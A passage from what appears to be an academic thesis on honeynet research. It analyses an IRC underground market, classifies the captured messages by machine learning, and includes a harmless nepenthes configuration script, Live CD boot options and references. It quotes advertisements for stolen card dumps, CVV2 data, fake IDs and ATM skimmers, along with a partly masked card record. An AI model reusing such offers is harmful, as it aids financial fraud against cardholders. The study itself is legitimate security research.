Address : ZIP : State : Country : Phone Number : Email Address : 52 xxxx1733xxxx3x 761 06/10 Eurie <... > <... > Ave Apt 3 <... > Texas United States <... > <... > @msn . com Listing 5.17: Example of a Full Personal Record 1 2 " Sell Fresh Full Info & Cvv2 ( AU , CA , UK , US , IT , SP , EU ) (...) " " SELLING CANADIAN ID ’S , Be anyone you WANT ! Great for WU Pickups (...) " 3 4 " Need Valid US Cvv2 & Full info (...) Msg . me Ready to Deal A . S . A . P !!!" Listing 5.18: Sample Advertisements and Requests for Personal Data 5.4.2.6 Equipment-Related Offers and Requests The hardware equipment which is needed to retrieve credit card-related information was also offered for sale in the communication channel we have monitored. In particular, blackhats advertised so-called skimmers as well as cameras for automated teller machines (ATMs) to secretly record the PIN and the respective carding data when a victim withdraws money from her account. The latter may then be processed by a MSR-206 magnetic card writer that creates a new, valid duplicate. Prices for such devices varied between $400 and $600 in the channel. Two typical product advertisements and a request that we have been confronted with are shown in Listing 5.19. 1 2 " Selling ATM SKIMMER + MSR206 with 5 blank magnetic cards (...) " " ATM Skimmers , Cameras , MSR206 , Readers , etc . for sale (...) " 3 4 " LOOKING FOR MSR 206 / MSG FOR MORE INFO ." Listing 5.19: Sample Advertisements and Requests for Hardware Equipment 5.4.3 Classification of the Entire Text Corpora As we have outlined, with the help of the manually labeled data, we were able to classify more than four fifth of the entire text corpora. In order to assess the remaining messages that we have captured in the channel during the observation period, we use statistical machine learning techniques that automatically associate each post with a meaningful 142 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.30: Process of a Machine Learning-Based Text Classification descriptor. Thereby, we are able to split the text corpora into different message categories and can roughly estimate the number of advertisements for hacking-related goods and services, corresponding requests, and other types of posts. Examples for the latter case are, e.g., recorded conversations between two adversaries that may or may not be directly related to the underground economy. Machine learning-based text classifications have already proven useful in the past for analyzing monitored IRC communications (see Franklin and Paxson, 2007; Elnahrawy, 2002; Mazzariello, 2008). Generally, the classification process is twofold (cmp. Sebastiani, 2002; Manning et al., 2008): In the first step, various example documents are passed as training data to a classification software. The training data are required to “learn” the prevailing characteristics of the categories of interest and build an apposite statistical model. On the basis of this model, new, unknown documents may then be properly classified in the second step. An overview about the operations is given in Figure 5.30. 143 5 Implementation, Deployment, and Analysis of a Honeynet Category Advertisements for Hacking-Related Goods and Services Requests for Hacking-Related Goods and Services Other Types of Posts Precision Value Recall Value 92.13% 75.73% 82.13% 73.28% 54.71% 90.80% Table 5.10: Average Precision and Recall Values of the Training Data For our purposes, we run the statistical classification software rainbow that was developed by Andrew McCallum41 . It implements several different classification algorithms and approaches, e.g., the probabilistic Naive Bayes approach which is chosen by default and is considered to be “one of the most efficient and effective inductive learning algorithms for machine learning” (see Zhang, 2004). Alternatively, example-based classifiers such as the k-nearest neighbor (KNN) or linear support vector machines (SVMs) may be applied for the text classification task as well. The latter are described in detail by Joachims (2002) but are not taken into consideration in our case. Regarding the first, learning-oriented phase, we train the rainbow package with a number of pre-selected example messages for each of our categories. We then check the robustness of the generated model in 5 test trials: In each trial, we randomly select 20% of the training data for testing and calculate both the precision and recall values. The precision and recall values determine the effectiveness of a classification operation and are defined as (cmp. Sebastiani, 2002): Precision = Recall = Number of Correct Positives Number of Predicted Positives (5.1) Number of Correct Positives Number of Actual Positives (5.2) The final scores for the different categories after the five test trials are listed in Table 5.10. As can be seen, both the randomly selected example advertisements as well as the corresponding requests are classified quite well. On the contrary, chat-related types of messages, unfortunately, only attain a mediocre precision that is likely caused by a lack of good sample data. Since our research focus is set on the first two categories, however, our model appears to be sufficiently robust to categorize the entire text corpora. To effectively carry out the classification task, we develop a simple client for the rainbow package that passes the 676.084 messages, one at a time, to the software. With the help of the client, we are able to complete the categorization within a short amount of 41 see http://www.cs.cmu.edu/~mccallum/bow/rainbow/ 144 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.31: Estimated Distribution of Offers and Requests in the Text Corpora time. The results of the operation are illustrated in Figure 5.31: We estimate more than 95% of all captured messages either offer or request hacking-related goods and services, while offers outnumber requests more than 5 to 1. In turn, conversations between adversaries and other, non-categorized types of posts approximately cover solely 4.8% of the text corpora and, thus, only play a minor role in an analysis of the communication channel. 5.4.4 Noticeable Characteristics of the Underground Market In the remainder of this section, we briefly illustrate various characteristics that we find are noticeable for the underground market we have observed. First, the market is affected by a high fluctuation: 64.54% of 1.345 unique nicks we have measured during the observation period have stayed only for one day on the channel. Furthermore, as indicated by the cumulative distribution function displayed in Figure 5.32, in more than 95% of all cases, the active lifetime of a nick was less than a week, and solely a small core of 36 nicks remained active for 10 days or more.42 Possible reasons for this distribution may be among the following but still need to be researched more closely in the future: • A large group of users either complete their transactions within a short amount of time, or they quickly leave the channel because their expectations are not sufficiently met, alternative channels are more promising, or due to a general lack of real interest in the underground economy. 42 The active lifetime of a nick indicates the total number of days, a nick has actively participated in the underground market and has posted at least one message to the channel per day. 145 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.32: Active Lifetime of Nicks in the Communication Channel • A small number of users appear to be seriously intrigued with the market activities. These core users presumably show a high involvement in the underground economy, strive for strong (business) relationships with other Internet miscreants, and seek to maximize their profit margins in the long term (see also Franklin and Paxson, 2007). Apart from the high fluctuation, other prevailing characteristics of the underground market are a high level of uncertainty and, as Franklin and Paxson (2007) term it, a “culture of dishonesty and distrust”: Many participants appear to be constantly concerned of “getting ripped”, i.e., falling prey to a defraud as the extracts shown in Listing 5.20 suggest. 1 2 3 " HAVE VIRGIN USA SKIMMED DUMPS FOR SHOPPING (...) RIPPERS DON ’ T WASTE MY TIME ! CONTACT ME ONLY IF YOU ’ RE FOR REAL ." 4 5 6 " CASHING CANADIAN DUMPS , 50/50 Share , No Rippers ! Serious People Only !" 7 8 9 10 " Selling EU dumps with pin [ track1 / track2 ] (...) NO KIDS , NO TESTS , NO RIPPERS .... IF YOU WASTE MY TIME I WILL IGNORE YOU !!! (...) " Listing 5.20: Sample Messages Indicating Distrust in Other Market Participants 146 5 Implementation, Deployment, and Analysis of a Honeynet In case a fraudulent operation is detected, the victim usually posts a warning message for other users to the channel, and the “ripper” is excluded from the market. Similar observations are also reported by Thomas and Martin (2006). As pointed out by Franklin and Paxson (2007, p. 13), however, these warning mechanisms may also be used against the underground community to see a “marked decrease in the number of successful transactions”: In a so-called slander attack, the status of honest sellers is systematically eliminated using false defamation. The authors argue that quality sellers are thus driven out of the market as they increasingly lose their customer base and are unable to maintain their price level (cmp. also Akerlof, 1970). In the long term, a lemon market situation is created, buyers cannot reliably distinguish the quality of goods and services any longer, and the respective economy eventually collapses. As Franklin and Paxson (2007, p. 13) conclude, this is “a desired outcome”. 5.5 Summary In this chapter, we have outlined the implementation, deployment, and analysis process for a honeynet setup with three electronic baits. Our decoys were based on both Microsoft Windows and Linux operating systems. We have installed various services and applications that were intentionally configured insecurely or contained well-known vulnerabilities. To mitigate risks for external third parties as best as possible in case of an intrusion, we have deployed the Honeywall, an observation and filtering gateway device that is capable of controlling traffic going to or coming from the individual honeypots. We have also introduced several tools and applications that greatly support security professionals when capturing and analyzing malicious activities. In the course of the thesis, we have witnessed a large number of penetration attempts from all over the world. We gave a brief overview about the collected data and illustrated typical threats and attack patterns. Two system compromises were presented in detail. We have examined the tools and tactics of the different intruders and developed basic profiles to determine their motives more accurately. We were also able to monitor a communication channel that was extensively used by adversaries. The results of these observations helped gain an insight in the hacking community and reveal some kind of underground economy. 147 6 Synopsis and Conclusion In the previous chapters, we have presented concepts and applications of current honeypot and honeynet technologies. A honeypot, as “an information system resource whose value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003a), implements specific features such as a number of known security weaknesses that make it particularly appealing to adversaries. It serves as an electronic bait and helps security professionals collect extensive information about intruders. When multiple decoys are grouped into a honeynet, malicious activities can be even watched across an entire network segment. With the bootable Live CD we have developed in the course of this thesis, such a honeynet may be deployed within a short amount of time. The CD is completely executed in memory and sets up an instance of the nepenthes honeypot in a secured environment. Nepenthes emulates various vulnerabilities that are frequently exploited by common types of self spreading malware and permits capturing worms and computer viruses on a large scale. Thereby, we are able to efficiently assess the level of threat on the Internet. In the second part of this thesis, we have watched human attackers within a honeynet of three decoys running Microsoft Windows- and Linux-based operating systems. These machines were constantly probed throughout the observation period. Two of the attacks were particularly interesting: In one case, an adversary compromised a misconfigured database management program and started uploading copyright-protected media. In a different attack, a black hat connected to several underground communication channels after our system had been penetrated. We were able to monitor these channels using utilities that were published by the Honeynet Project. After investigating the recorded text messages, we found evidence for a vivid trade of stolen credit card numbers and other confidential data. In summary, honeypots and honeynets offer a systematic approach to come to a deeper understanding of adversaries and learn more about their tools, tactics, and motives. By watching the steps of intruders, we are able to collect empirical data and shed light on an Internet community which is frequently misunderstood and misperceived (cmp. Rogers, 2000a; Fötinger and Ziegler, 2004). These pro-active measures complement traditional, more defense-oriented fields of IT security. Furthermore, as electronic baits evolve and get more sophisticated, attackers will possibly be forced to react and start developing countermeasures in order to evade detection. Basic techniques have already been described by Corey (2003) and Corey (2004), other approaches have been demonstrated by Dornseif et al. (2004a) and Holz and Raynal (2005b) (cmp. Chapter 2). As Lance Spitzner points out, this is “a good indication that this technology has started to make 148 6 Synopsis and Conclusion a difference; (...) We are now making the attackers react to us; it’s one of the few ways we can take the initiative back” (see Honeynet Project, 2004b, p. 683). However, it is also important to note that honeynet research suffers from specific inherent problems and faces certain limitations at the time of this writing. First, some of the major monitoring tools are still quite immature. For example, the Sebek keystroke logging utility turned out to be incompatible with recent versions of Microsoft Windows operating systems and caused regular system crashes. Furthermore, some data capture components of the Honeywall periodically stopped working1 and led to inconsistent data sources. The latter types of flaws were usually quickly fixed by participants of the Honeynet Project though. In addition, there appears to be a tendency honeynet setups mostly attract automated attacks and low-skilled intruders (see Honeynet Project, 2004b). In the course of our thesis, we have not witnessed any advanced or even new threats. Unfortunately, we did not see any system compromises due to exploit code either. On the other hand, many attackers initiated connections over encrypted communication channels whenever possible. Similar findings are reported by other security professionals as well (cmp. Honeynet Project, 2004b, p. 39, 58-59). Therefore, data capture as well as data analysis applications must be adapted to keep up with adversaries in the future. Last but not least, legal implications of honeynet architectures have not been sufficiently evaluated yet. For instance, luring a black hat into a trap may fall in the scope of specific privacyand entrapment-related acts (cmp. Spitzner, 2003d). To the best knowledge of the author, existing literature is focused on US law to date. Thus, deploying electronic baits in other countries remains a twilight zone. Taking the different aspects into consideration, we find several areas of interest that are worth studying in more detail. These opportunities for future research are briefly illustrated below. Opportunities for Future Research In this thesis, we have concentrated on capturing and analyzing server-related malicious activities. This approach is effective to estimate the level of threat for common systems and services deployed on the Internet today. On the other hand, Provos and Holz (2007) point out, there was a growing trend for attackers exploiting security weaknesses in typical user applications such as web browsers or email programs. For this reason, many authors suggest developing client-side honeypots and actively scan web sites, chat rooms, and peer-to-peer (P2P) networks for malicious content (see Seifert et al., 2006; Danford, 2006; Ikinci et al., 2008). These types of honeypots are possibly also capable of capturing 0-day exploits and other new attack techniques that are unknown to the security community to date (cmp. Feinstein and Peck, 2007). Preliminary findings in this area are promising (see Wang et al., 2005). 1 Note: For more information, please see the discussion on the mailing list of the Honeynet Project, https://public.honeynet.org/mailman/listinfo 149 6 Synopsis and Conclusion In addition, as members of the Honeynet Project (2004b) state, almost all honeynets are set up on external networks. Thus, there is lack of empirical data regarding attacks by insiders, even though this group may cause severe havoc, particularly in a business-oriented environment (cmp. Rogers, 2005). Technically sophisticated production honeypots may help reveal malevolent behavior within organizations and cope with these risks. Furthermore, Lance Spitzner argues, “most honeynets have been stand-alone deployments, giving you an isolated picture of threat activity” (see Honeynet Project, 2004b, p. 680). As we have explained in Chapter 3, distributed honeynets may solve these issues, because data are acquired from multiple sources. However, publicly available research results in this field are quite limited at the time of this writing (see Watson, 2007) and still need to be assessed in more detail in the future. Last but not least, we feel psychological aspects in computer crime are still inadequately covered in the literature, even though, according to Max Kilger, “an understanding of the blackhat community is equally as important as an understanding of the technical tools used to discover their exploits” (see Honeynet Project, 2004b, p. 506). In recent years, various authors have attempted to develop statistically valid models of adversaries (cmp. Rogers, 2000a, 2005; Chantler, 1995; Woo, 2003; Fötinger and Ziegler, 2004). If we succeed in observing more advanced and sophisticated attackers, honeynets may well contribute to these activities. 150 A Configuration Script for the Nepenthes Honeypot The behavior and appearance of the nepenthes low-interaction honeypot may be quickly and comfortably adapted with the graphical configuration interface that is implemented on the Live CD (see Section 4.3.3.2). The interface is technically based on a custom shell script which makes ample use of the dialog package by Vincent Stemen as well as the awk and sed text processing utilities. In the following listing, an extract of the shell script is shown. The main configuration file nepenthes.conf is read in, and the list of nepenthes vulnerability modules is extracted with the help of specially crafted regular expressions (cmp. Lines 12 to 20). This list is displayed in a new module selection window in the next step as indicated in Lines 24 to 27 of Listing A.1. By clicking on a certain item, the user may then interactively enable or disable the respective component of the honeypot. After all changes have been made, the program settings are updated and come into effect once the decoy is restarted (see Lines 32 to 66). 1 #! / b i n / s h 2 3 4 tempfile = ‘ tempfile 2 >/ dev / null ‘ || tempfile =/ tmp / conf$$ trap " rm -f $tempfile " 0 1 2 5 15 5 6 7 8 # name o f t h e n e p e n t h e s main c o n f i g u r a t i o n f i l e N E P E N T H E S _ C O N F I G _ F I L E = " (...) / etc / nepenthes / nepenthes . conf " ... 9 10 11 12 13 # read in the nepenthes c o n f i g u r a t i o n # th e v u l n e r a b i l i t y modules awk ’/ vuln .*\. so /{ total += 1; f i l e , and e x t r a c t t h e names o f 14 15 16 17 18 19 20 # c h e c k i f t h e module i s d i s a b l e d , i . e . , i s commented o u t if ( $1 ~/\/\//) print $2 " " total " off \ n " ; else print $2 " " total " on \ n " } ’ $ N E P E N T H E S _ C O N F I G _ F I L E > $tempfile 21 22 data = ‘ cat $tempfile ‘ 151 A Configuration Script for the Nepenthes Honeypot 23 24 25 26 27 # d i s p l a y t h e module s e l e c t i o n window _vuln = $ (/ usr / bin / dialog -- stdout -- clear \ -- backtitle " (...) " -- title " Configure Vulnerability Modules " \ -- checklist " \ nPlease select the vulnerability modules you would like to enable at startup .\ n " 0 0 10 $data ) 28 29 ... 30 31 32 33 34 35 36 37 38 39 # s a v e t h e new s y s t e m s e t t i n g s awk ’ BEGIN { # g e t t h e names o f t h e s e l e c t e d m o d u l e s for ( x =1; x < ARGC -2; x ++) { vuln [x -1]= ARGV [ x ]; delete ARGV [ x ] } }/ vuln .*\. so /{ found =0 40 41 42 43 44 # a c t i v a t e t h e s e l e c t e d modules in t h e c o n f i g u r a t i o n for ( module in vuln ) { if ( $0 ~ vuln [ module ]) { found =1; file 45 # t o a c t i v a t e a s p e c i f i c module i n t h e c o n f i g u r a t i o n f i l e , # p r i o r l y e x i s t i n g comment c h a r a c t e r s must b e removed if (( $0 ~/\/\//) ) { ... sub ( " // " ," " , $0 ) 46 47 48 49 50 51 # update the c o n f i g u r a t i o n f i l e system ( " sed -e s \47/ " config_entry " / " $0 " /\47 " ARGV [ ARGC -1] " > " ARGV [ ARGC -2] " && cp " ARGV [ ARGC -2] " " ARGV [ ARGC -1]) 52 53 54 } break 55 56 } 57 58 } 59 60 61 62 63 64 65 66 # t o d e a c t i v a t e a s p e c i f i c module i n t h e c o n f i g u r a t i o n f i l e , # t h e r e s p e c t i v e e n t r y must b e commented o u t if (( found ==0) && (!( $0 ~/\/\//) ) ) { system ( " sed -e s \47/ " $0 " /\\/\\/ " $0 " /\47 " ARGV [ ARGC -1] " > " ARGV [ ARGC -2] " && cp " ARGV [ ARGC -2] " " ARGV [ ARGC -1]) } } ’ $_vuln $tempfile $ N E P E N T H E S _ C O N F I G _ F I L E Listing A.1: Extract of the Configuration Script for the nepenthes Honeypot 152 B Boot Options of the Live CD When the Live CD is launched, the user may invoke the Isolinux boot loader with different boot options (see Section 4.3.3.4). These options are passed to the system kernel in order to change specific, runtime-related aspects of the operating system. For instance, it is possible to disable certain hardware devices or adapt the default video mode. Such customizations are particularly useful in case the machine stalls or even unexpectedly crashes during the startup phase. A brief description of the most important boot options is shown in Table B.1, a more detailed reference is available from the Linux Kernel Organization (2009). To take effect, the individual options must be added to the APPEND section of the respective boot label. Boot Option vga=<...> acpi=off nohotplug nopcmcia noagp nodma noauto nohd nocd from=<...> root=<...> Description Changes the default video mode. Thereby, the CD can be run on systems with limited screen resolution capabilities. In order to switch to another mode, a so-called VESA (Video Electronics Standards Association) mode number must be entered. An overview about valid mode numbers is given by Knorr (2009). Disables specific autodetection routines for hardware devices, e.g., memory or video cards. This option is recommended in case the system stalls during the boot process. Disables the Direct Memory Access (DMA) mode for hardware devices. Hardware drives such as disks or CD-ROM drives are not automatically mounted during the boot process. In order to access a specific disk or drive, it has to be manually mounted during runtime. Loads the Live CD from a specific drive or path. For example, the option from=/dev/hda1 invokes the CD from the first hard drive. Specifies the root device. In the case of the Live CD, the initial ram disk /dev/ram0 is mounted as root (see also Almesberger and Lermen, 2000). Table continues on the following page. 153 B Boot Options of the Live CD Boot Option passwd=<...> changes=<...> toram copy2ram ramdisk_size=<...> load=module debug autoexec=<...> Description Sets the system password for the root superuser account to a specific string. In case the option is set to passwd=ask, the user is prompted to set a new password during the boot process. Changes made at runtime are persistently stored to a specific file or drive. Thereby, no data are lost if the system is shutdown or rebooted. All files are copied to memory. Although this may consume large portions of space and slow down the boot process, operations at runtime may be significantly accelerated. Sets the size of the initial ram disk which serves as a temporary root file system during the boot process of the operating system. The default size of the disk is 4096 kB (see Gortmaker, 2004). Loads a specific file system module when booting the CD. In case the noload=<module> option is set, a certain module may be excluded from the boot process. Enables the debug mode during the boot process and reports the status of specific internal operations. Executes a pre-defined command instead of displaying the default login manager. For instance, to automatically invoke the XWindow system and skip the authentication procedure, the option must be set to autoexec=startx. Table B.1: Important Boot Options of the Live CD (Source: Based on Matejicek, 2008a; Linux Kernel Organization, 2009) 154 References [Ajzen 1991] Ajzen, Icek: The Theory of Planned Behavior. In: Organizational Behavior and Human Decision Processes 2 (1991), No. 50, p. 179–211 [Akerlof 1970] Akerlof, George A.: The Market for “Lemons”: Quality Uncertainty and the Market Mechanism. In: The Quarterly Journal of Economics 84 (1970), No. 3, p. 488–500 [Aleph One 1996] Aleph One: Smashing the Stack for Fun and Profit. In: Phrack Magazine 49 (1996), No. 14 [Almesberger and Lermen 2000] Almesberger, Werner ; Lermen, Hans: Using the Initial RAM Disk (initrd). Published: 2000. http://www.kernel.org/doc/ Documentation/initrd.txt, Retrieved: August 11, 2009 [Andrews and Whittaker 2006] Andrews, Mike ; Whittaker, James A.: Break Web Software. Addison Wesley, 2006 How to [Antonomasia 2003] Antonomasia: Additional Logging for Honeypots. Published: 2003. http://www.notatla.org.uk/SOFTWARE/honeypot_code_description.html, Retrieved: August 11, 2009 [Bächer et al. 2008] Bächer, Paul ; Holz, Thorsten ; Kötter, Markus ; Wicherski, Georg: Know your Enemy: Tracking Botnets. Published: October 2008. http: //honeynet.org/papers/bots/, Retrieved: August 11, 2009 [Bächer et al. 2006] Bächer, Paul ; Kötter, Markus ; Holz, Thorsten ; Dornseif, Maximillian ; Freiling, Felix: The Nepenthes Platform: An Efficient Approach to Collect Malware. In: 9th International Symposium on Recent Advances in Intrusion Detection, 2006 [Balas and Viecco 2005] Balas, Edward ; Viecco, Cimo: Towards a Third Generation Data Capture Architecture for Honeynets. In: Proceedings of the 6th IEEE Information Assurance Workshop, 2005, p. 21–28 [Baldwin 2002a] Baldwin, Lawrence: Pubstro Forensics. Published: September 2002. http://www.mynetwatchman.com/kb/security/articles/winforensics/ index.htm, Retrieved: August 11, 2009 155 References [Baldwin 2002b] Baldwin, Lawrence ; myNetWatchman (Editor): Windows Messenger Delivery Options: SMB vs. MS RPC. Published: November 2002. http: //www.mynetwatchman.com/kb/security/articles/popupspam/netsend.htm, Retrieved: August 11, 2009 [Baldwin 2003] Baldwin, Lawrence: myNetWatchman Alert - Windows PopUP SPAM. Published: September 2003. http://www.mynetwatchman.com/kb/ security/articles/popupspam/, Retrieved: August 11, 2009 [Barford et al. 2002] Barford, Paul ; Kline, Jeffery ; Plonka, David ; Ron, Amos: A Signal Analysis of Network Traffic Anomalies. In: Proceedings of the 2nd ACM SIGCOMM Workshop on Internet Measurement, 2002 [Bastian 2004] Bastian, Waldo: The KDE User Guide. Published: June 2004. http: //docs.kde.org/development/en/kdebase-runtime/userguide/index.html, Retrieved: August 11, 2009 [Bauer 2001] Bauer, Mick: Swatch: Automated Log Monitoring for the Vigilant but Lazy. Published: 2001. http://www.linuxjournal.com/article/4776, Retrieved: August 11, 2009 [Bernstein 1996] Bernstein, Daniel J.: SYN Cookies. Published: 1996. http://cr. yp.to/syncookies.html, Retrieved: August 11, 2009 [Bernstein 2005] Bernstein, Daniel J.: Cache-Timing Attacks on AES. Published: 2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf, Retrieved: August 11, 2009 [Brand 2007] Brand, Nicholas: The LiveCD List. Published: 2007. http://www. livecdlist.com/, Retrieved: August 11, 2009 [Brockmeier 2001] Brockmeier, Joe ; IBM DeveloperWorks (Editor): Slackware Linux 101 - A Look at what Happens when You Boot Your Linux Box. Published: March 2001. http://www.ibm.com/developerworks/linux/library/ l-slack.html, Retrieved: August 11, 2009 [Brohan 2009] Brohan, Mark: The Top 500 Guide. Published: June 2009. http: //www.internetretailer.com/article.asp?id=30594, Retrieved: August 11, 2009 [Brownlee et al. 1997] Brownlee, Nevil ; Mills, Carl ; Ruth, Gregory R.: RFC: 2063 - Traffic Flow Measurement: Architecture. Published: 1997. http://www.ietf.org/ rfc/rfc2063.txt, Retrieved: August 11, 2009 [Buddenhagen 2007] Buddenhagen, Oswald: The KDM Handbook. Published: Dezember 2007. http://docs.kde.org/kde3/en/kdebase/kdm/kdm.pdf, Retrieved: August 11, 2009 156 References [Burr 2002] Burr, Simon: How to Break Out of a Chroot() Jail. Published: 2002. http://www.bpfh.net/simes/computing/chroot-break.html, Retrieved: August 11, 2009 [Cameron 2003] Cameron, Jamie: Managing Linux Systems with Webmin - System Administration and Module Development. Addison Wesley, 2003 [Capgemini 2008] Capgemini (Editor): Studie IT-Trends 2008 (German). Published: 2008. http://www.at.capgemini.com/m/at/tl/IT-Trends_2008.pdf, Retrieved: August 11, 2009 [Carrier 2006] Carrier, Brian D.: Risks of Live Digital Forensic Analysis. In: Communications of the ACM 49 (2006), No. 2, p. 56–61 [Caswell et al. 2007] Caswell, Brian ; Beale, Jay ; Baker, Andrew: Snort Intrusion Detection and Prevention Toolkit. Syngress Publishing, 2007 [CERT 1996] CERT (Editor): Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks. Published: 1996. http://www.cert.org/advisories/CA-1996-21. html, Retrieved: August 11, 2009 [CERT 1998] CERT (Editor): Advisory CA-1998-12 Remotely Exploitable Buffer Overflow Vulnerability in mountd. Published: 1998. http://www.cert.org/advisories/ CA-1998-12.html, Retrieved: August 11, 2009 [CERT 2001a] CERT (Editor): Advisory CA-2001-19 “Code Red” Worm Exploiting Buffer Overflow In IIS Indexing Service DLL. Published: 2001. http://www.cert. org/advisories/CA-2001-19.html, Retrieved: August 11, 2009 [CERT 2001b] CERT (Editor): Advisory CA-2001-23 Continued Threat of the “Code Red” Worm. Published: 2001. http://www.cert.org/advisories/CA-2001-23. html, Retrieved: August 11, 2009 [CERT 2001c] CERT (Editor): Denial of Service Attacks. Published: June 2001. http: //www.cert.org/tech_tips/denial_of_service.html, Retrieved: August 11, 2009 [CERT 2003a] CERT (Editor): Advisory CA-2003-04 MS-SQL Server Worm. Published: January 2003. http://www.cert.org/advisories/CA-2003-04.html, Retrieved: August 11, 2009 [CERT 2003b] CERT (Editor): Advisory CA-2003-24 Buffer Management Vulnerability in OpenSSH. Published: 2003. http://www.cert.org/advisories/CA-2003-24. html, Retrieved: August 11, 2009 157 References [CERT 2004] CERT (Editor): Computer Emergency Response Team: Vulnerability Note VU 497400. Published: November 2004. http://www.kb.cert.org/vuls/id/ 497400, Retrieved: August 11, 2009 [CERT 2009] CERT (Editor): CERT Statistics. Published: February 2009. http: //www.cert.org/stats/, Retrieved: August 11, 2009 [Chang 2002] Chang, Rocky K. C.: Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial. In: IEEE Communications Magazine 40 (2002), No. 10, p. 42–51 [Chantler 1995] Chantler, Alan N.: Risk: The Profile of the Computer Hacker, School of Information Systems, Curtin Business School, (PHD Thesis), 1995 [Chiesa et al. 2009] Chiesa, Raoul ; Ciappi, Silvio ; (Autor), Stefania D.: Profiling Hackers - The Science of Criminal Profiling as Applied to the World of Hacking. Taylor & Francis Group, 2009 [Chung et al. 1995] Chung, Mandy ; Puketza, Nicholas ; Olsson, Ronald A. ; Mukherjee, Biswanath: Simulating Concurrent Intrusions for Testing Intrusion Detection Systems: Parallelizing Intrusions. In: Proceedings of the 1995 National Information Systems Security Conference, 1995 [Comer 2000] Comer, Douglas E.: Internetworking with TCP/IP: Principles, Protocols, and Architecture. 4th Edition. Prentice Hall, 2000 [Corey 2003] Corey, Joseph: Local Honeypot Identification. Published: 2003. http: //www.ouah.org/p62-0x07.txt, Retrieved: August 11, 2009 [Corey 2004] Corey, Joseph: Advanced Honeypot Identification and Exploitation. Published: 2004. http://www.ouah.org/p63-0x09.txt, Retrieved: August 11, 2009 [Craig and Burnett 2005] Craig, Paul ; Burnett, Mark: Software Piracy Exposed. Syngress Publishing, 2005 [Creasy 1981] Creasy, Robert J.: The Origin of the VM/370 Time-Sharing System. In: IBM Journal of Research and Development 25 (1981), No. 5, p. 483–490 [Criscuolo 2000] Criscuolo, Paul J.: Distributed Denial of Service. Published: February 2000. http://www.itsec.gov.cn/webportal/download/ 2000-CIAC-2319_Distributed_Denial_of_Service.pdf, Retrieved: August 11, 2009 [Cross and Shinder 2008] Cross, Michael ; Shinder, Debra L.: Scene of the Cybercrime. 2nd Edition. Syngress Publishing, 2008 158 References [Curran et al. 2005] Curran, Kevin ; Morrissey, Colman ; Fafan, Colm ; Murphy, Colm ; O’Donnell, Brian ; Fitzpatrick, Gerry ; Condit, Stephen: Monitoring Hacker Activity with a Honeynet. In: International Journal of Network Management (2005), p. 123–134 [CVE 2003] CVE (Editor): CVE-2003-0466. Published: 2003. http://secunia.com/ advisories/cve_reference/CVE-2003-0466/, Retrieved: August 11, 2009 [CVE 2005] CVE (Editor): CVE-2005-0200. Published: 2005. http://cve.mitre. org/cgi-bin/cvename.cgi?name=CVE-2005-0200, Retrieved: August 11, 2009 [CVE 2006a] CVE (Editor): CVE-2006-3392. Published: 2006. http://cve.mitre. org/cgi-bin/cvename.cgi?name=CVE-2006-3392, Retrieved: August 11, 2009 [CVE 2006b] CVE (Editor): CVE-2006-6912. Published: 2006. http://secunia. com/advisories/cve_reference/CVE-2006-6912/, Retrieved: August 11, 2009 [Dalheimer and Welsh 2005] Dalheimer, Matthias K. ; Welsh, Matt: Running Linux. O’Reilly, 2005 [Danford 2006] Danford, Robert: 2nd Generation Honeyclients. Published: 2006. http://handlers.dshield.org/rdanford/pub/Honeyclients_Danford_ SANSfire06.pdf, Retrieved: Apr 22, 2009 [Deloitte 2009] Deloitte (Editor): Losing Ground - TMT Global Security Survey. Published: 2009. http://www.deloitte.com/dtt/cda/doc/content/me_fsi_ 281106_globalsecuritysurvey.pdf, Retrieved: August 11, 2009 [Dent 2002] Dent, Kyle D.: Postfix: The Definitive Guide. O’Reilly, 2002 [Dike 2006] Dike, Jeff: User Mode Linux. Prentice Hall, 2006 [DistroWatch 2007] DistroWatch (Editor): Linux Distributions - Facts and Figures. Published: July 2007. http://distrowatch.com/stats.php?section=popularity, Retrieved: August 11, 2009 [Dong-Hun 2003] Dong-Hun, You: Wu-FTPd v2.6.2 Off-by-One Remote 0day Exploit. Published: 2003. http://www.milw0rm.com/exploits/74, Retrieved: August 11, 2009 [Dornseif et al. 2004a] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian: NoSEBrEaK - Attacking Honeynets. In: Procceedings of the 5th Annual IEEE Information Assurance Workshop, 2004 159 References [Dornseif et al. 2004b] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian N.: NoSEBrEaK - Defeating Honeynets. Published: 2004. http://www.blackhat. com/presentations/bh-usa-04/bh-us-04-holz/bh-us-04-holz-up.pdf, Retrieved: August 11, 2009 [Dougherty and Robbins 1997] Dougherty, Dale ; Robbins, Arnold: Sed & Awk. O’Reilly, 1997 [Ducea 2006] Ducea, Marius: Rotating Linux Log Files. Published: 2006. http://www. ducea.com/2006/06/06/rotating-linux-log-files/, Retrieved: August 11, 2009 [Eckstein et al. 2007] Eckstein, Robert ; Watters, Paul A. ; Ts, Jay ; Carter, Gerald: Using Samba. 3rd Edition. O’Reilly, 2007 [Eddy 2007] Eddy, Wesley M.: RFC: 4987 - TCP SYN Flooding Attacks and Common Mitigations. Published: 2007. http://www.ietf.org/rfc/rfc4987.txt, Retrieved: August 11, 2009 [Elnahrawy 2002] Elnahrawy, Eiman M.: Log-Based Chat Room Monitoring Using Text Categorization: A Comparative Study. In: Proceedings of the Proceedings of the International Conference on Information and Knowledge Sharing, 2002 [Eurostats 2008] Eurostats (Editor): European Consumer Summit - Online Shopping by Individuals in EU27. Published: 2008. http://epp.eurostat.ec.europa.eu, Retrieved: August 11, 2009 [Farmer and Venema 2005] Farmer, Dan ; Venema, Wietse: Addison Wesley, 2005 Forensic Discovery. [Feinstein and Peck 2007] Feinstein, Ben ; Peck, Daniel: Caffeine Monkey: Automated Colleciton, Detection and Analysis of JavaScript. Published: 2007. http://www.secureworks.com/research/blog/wp-content/uploads/ bh-usa-07-feinstein_and_peck-WP.pdf, Retrieved: August 11, 2009 [Fishbein and Ajzen 1975] Fishbein, Martin ; Ajzen, Icek: Belief, Attitude, Intention and Behavior: An Introduction to Theory and Research. Addison Wesley, 1975 [Flenov 2005] Flenov, Michael: Hacker Linux Uncovered. 